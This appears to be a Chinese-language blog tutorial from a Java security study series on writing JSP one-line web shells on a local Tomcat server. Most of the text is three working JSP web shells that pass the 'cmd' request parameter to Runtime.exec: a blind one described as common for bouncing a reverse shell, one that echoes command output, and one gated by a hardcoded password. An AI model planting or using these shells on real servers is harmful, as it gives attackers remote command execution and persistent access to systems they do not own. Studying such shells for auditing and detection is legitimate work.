java安全——jsp一句话木马

jsp回显一句话木马

文章目录

  • jsp回显一句话木马
  • 一、搭建web服务
    • 1、创建空白maven项目,搭建本地tomcat
    • 2、引入servlet的pom依赖
  • 二、无回显一句话
  • 三、带回显一句话
  • 三、有密码带回显一句话


提示:以下是本篇文章正文内容,下面案例可供参考

一、搭建web服务

1、创建空白maven项目,搭建本地tomcat

java安全——jsp一句话木马_第1张图片

java安全——jsp一句话木马_第2张图片

2、引入servlet的pom依赖

java安全——jsp一句话木马_第3张图片

二、无回显一句话

 <%
    Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
%>

http://localhost:8003/index.jsp?cmd=whoami
不会回显执行的结果只能在后台打印一个地址,常用来反弹shell
java安全——jsp一句话木马_第4张图片

三、带回显一句话

代码如下(示例):

  <%
    Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
//    System.out.println(process);
    InputStream inputStream = process.getInputStream();
    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
    String line;
    while ((line = bufferedReader.readLine()) != null){
      response.getWriter().println(line);
    }
  %>

java安全——jsp一句话木马_第5张图片


三、有密码带回显一句话

  <%
    if ("password".equals(request.getParameter("pass"))){
      Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
//    System.out.println(process);
      InputStream inputStream = process.getInputStream();
      BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
      String line;
      while ((line = bufferedReader.readLine()) != null){
        response.getWriter().println(line);
      }
    }
  %>

java安全——jsp一句话木马_第6张图片

你可能感兴趣的:(java代码审计笔记,java,安全,servlet)